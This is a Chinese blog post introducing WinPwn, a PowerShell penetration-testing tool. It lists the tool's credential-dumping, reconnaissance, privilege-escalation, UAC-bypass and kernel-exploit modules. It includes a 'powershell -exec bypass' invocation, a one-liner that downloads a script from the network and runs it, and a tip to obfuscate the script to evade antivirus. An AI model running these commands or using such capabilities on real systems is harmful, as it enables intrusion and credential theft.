AI智能
改变未来

域信息收集自动脚本​WinPwn

行业解决方案、产品招募中!想赚钱就来传!>>>

WinPwn

自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。

本地调用

powershell.exe -exec bypass -command \"& {import-module  C:\\Users\\17782\\Desktop\\WinPwn-master\\WinPwn-master\\offline_WinPwn.ps1;localreconmodules}\"

远程下载调用

iex(new-object net.webclient).downloadstring(\'https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\')

绕杀软需要自己混淆或者手动对触发器字符串进行编码。

具体功能有:

  • Inveigh->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击

  • sessionGopher->执行Sessiongopher询问您参数

  • kittielocal->

  • 模糊的调用-Mimikatz版本

  • 内存中的Safetykatz

  • 使用rundll32技术转储lsass

  • 下载并运行混淆的Lazagne

  • 转储浏览器凭证

  • 定制的Mimikittenz版本

  • 窃取Wifi凭证

  • 转储SAM文件NTLM哈希

  • localreconmodules->

    • 收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等

    • 检查典型的漏洞,如SMB签名,LLMNR中毒,MITM6,通过HTTP的WSUS

    • 检查Powershell事件日志中的凭证或其他敏感信息

    • 收集浏览器凭证和历史记录

    • 在注册表和文件系统中搜索密码

    • 查找敏感文件(配置文件,RDP文件,Keepass数据库)

    • 在本地系统上搜索.NET Binaries

    • 可选:Get-Computerdetails(Powersploit)和PSRecon

  • domainreconmodules->

    • 收集各种域信息以进行手动检查

    • 在说明字段中找到广告密码

    • 搜索潜在的敏感域共享文件

    • 枚举不受约束的委派系统/用户

    • 生成猎犬报告

    • 用于域系统的MS17-10扫描仪

    • 适用于域系统的Bluekeep扫描仪

    • SQL Server发现和审核功能-PowerUpSQL

    • MS-RPRN检查域控制器或所有系统

    • Grouper2的组策略审核

    • 使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。

    • 检查打印机的常见问题

    • 搜索基于资源的约束委派攻击路径

  • Privescmodules

    • itm4ns调用-PrivescCheck

    • winPEAS

    • Powersploits PowerUp Allchecks,Sherlock,GPPPasswords

    • DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查

  • kernelexploits->

    • MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!

    • MS16-032-(2008/7/8/10/2012)!

    • MS16-135-(仅WS2k16)!

    • CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!

    • CVE-2019-0841-2019年4月!

    • CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!

    • CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!

    • CVE-2019-1215-2019年9月-仅x64!

    • CVE-2020-0638-2020年2月-仅x64!

    • CVE-2020-0796-SMBGhost

  • UACBypass->

    • UAC Magic,基于James Forshaw在UAC上的三篇文章

    • UAC绕过cmstp技术,作者:Oddvar Moe

    • DiskCleanup UAC旁路,James Forshaw提供

    • DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte

  • SYSTEMShell->

    • 使用CreateProcess弹出系统shell

    • 使用NamedPipe模拟模仿Pop System Shell

    • 使用令牌操作的Pop System Shell

    • 使用UsoClient DLL加载或CreateProcess绑定系统shell

    更多功能,大家可以自行到github上看文档,这个工具不错的。

    https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher—executes-sessiongopher-asking-you-for-parameters

    欢迎各位小伙伴进来交流学习。


    本文分享自微信公众号 – 黑白天(li0981jing)。
    如有侵权,请联系 [email protected] 删除。
    本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

    赞(0) 打赏
    未经允许不得转载:爱站程序员基地 » 域信息收集自动脚本​WinPwn